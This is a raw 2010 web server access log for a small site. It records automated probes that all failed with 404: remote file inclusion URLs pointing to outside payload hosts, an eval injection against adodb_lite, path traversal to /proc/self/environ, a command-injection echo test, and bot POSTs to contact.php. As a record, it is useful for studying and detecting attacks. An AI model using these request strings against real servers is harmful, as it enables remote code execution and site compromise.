93.232.214.130 - - [24/Jul/2010:04:12:41 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:04:12:41 -0700] "GET /logs/access_100612.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
93.232.214.130 - - [24/Jul/2010:04:13:20 -0700] "GET /logs/access_100605.log%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wjw.kr/.bash_history/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:13:32 -0700] "GET /ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:13:32 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:13:32 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:43 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:43 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:44 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:47 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:47 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:47 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:49 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:56 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:56 -0700] "GET /logs/access_100612.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:57 -0700] "GET /index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:13:57 -0700] "GET /logs//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
88.198.183.48 - - [24/Jul/2010:04:14:13 -0700] "GET /logs/access.log//index.php?option=com_ganalytics&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:14:20 -0700] "GET /logs/access_100320.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:14:25 -0700] "GET /logs/access_100417.log//ashnews.php?pathtoashnews=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.247.204.38 - - [24/Jul/2010:04:15:15 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.getyourselfahorse.com"
86.109.96.188 - - [24/Jul/2010:04:15:20 -0700] "GET /logs/access_100515.log///appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
86.109.96.188 - - [24/Jul/2010:04:15:20 -0700] "GET /logs///appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
86.109.96.188 - - [24/Jul/2010:04:15:20 -0700] "GET /logs/access_100313.log///appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
86.109.96.188 - - [24/Jul/2010:04:15:20 -0700] "GET //appserv/main.php?appserv_root=http://www.wfps.tcc.edu.tw//appserv/p1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
61.247.204.38 - - [24/Jul/2010:04:16:46 -0700] "GET / HTTP/1.1" 200 915 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:17:16 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:17:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:17:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:17:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:14 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:15 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:15 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:15 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:17 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:17 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:18 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:18 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:18:18 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /logs/access_100227.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /logs/access_100227.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:21:07 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
92.243.84.187 - - [24/Jul/2010:04:26:16 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "http://www.getyourselfahorse.com/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:27:10 -0700] "GET /logs/access_100424.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:27:10 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:27:11 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:07 -0700] "GET /logs/access_100508.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:07 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:07 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:08 -0700] "GET /logs/access_100508.log%20%20//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:08 -0700] "GET /logs//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:29:08 -0700] "GET /index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
125.141.91.138 - - [24/Jul/2010:04:29:14 -0700] "GET /logs/access_100501.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.watpalelai.org/includes/PEAR/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:30:45 -0700] "GET /logs/access_100320.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.tourgaja.net/www/data/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
85.236.50.166 - - [24/Jul/2010:04:30:45 -0700] "GET /logs/access_100320.log//index.php?option=com_frontpage…//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=%7Cecho%20%22casper%22;echo%20%22kae%22;%7C HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:32:36 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:32:36 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:32:36 -0700] "GET /logs/access_100529.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:32:59 -0700] "GET /logs/access_100515.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:56 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:57 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:57 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:37:57 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:39:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:39:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:39:27 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:39:28 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:27 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:27 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:27 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:27 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:28 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:40:28 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:40:33 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:40:34 -0700] "GET /logs/access_100501.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:40:34 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:40:48 -0700] "GET /logs/access_100612.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.yangsheng.ru/board/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:34 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
91.83.64.16 - - [24/Jul/2010:04:41:35 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "kmccrew Bot Search" "getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:46:39 -0700] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:46:39 -0700] "GET /logs/access_100619.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:46:39 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:47:12 -0700] "GET /logs/access_100306.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:48:45 -0700] "GET /index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:48:45 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
83.16.100.218 - - [24/Jul/2010:04:48:45 -0700] "GET /logs/access_100417.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.yangsheng.ru/board/fx29id.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:49:11 -0700] "GET /logs/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:49:11 -0700] "GET /errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:49:11 -0700] "GET /logs/access_100529.log%20%20/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
74.124.198.168 - - [24/Jul/2010:04:49:21 -0700] "GET /logs/access_100522.log%20%20/errors.php?error=http://livetest.foregroundsecurity.com//Iivetest/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:50:22 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
117.103.56.20 - - [24/Jul/2010:04:50:34 -0700] "GET /index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.getyourselfahorse.com"
222.236.47.182 - - [24/Jul/2010:04:50:38 -0700] "GET /logs/access_100703.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.getyourselfahorse.com"
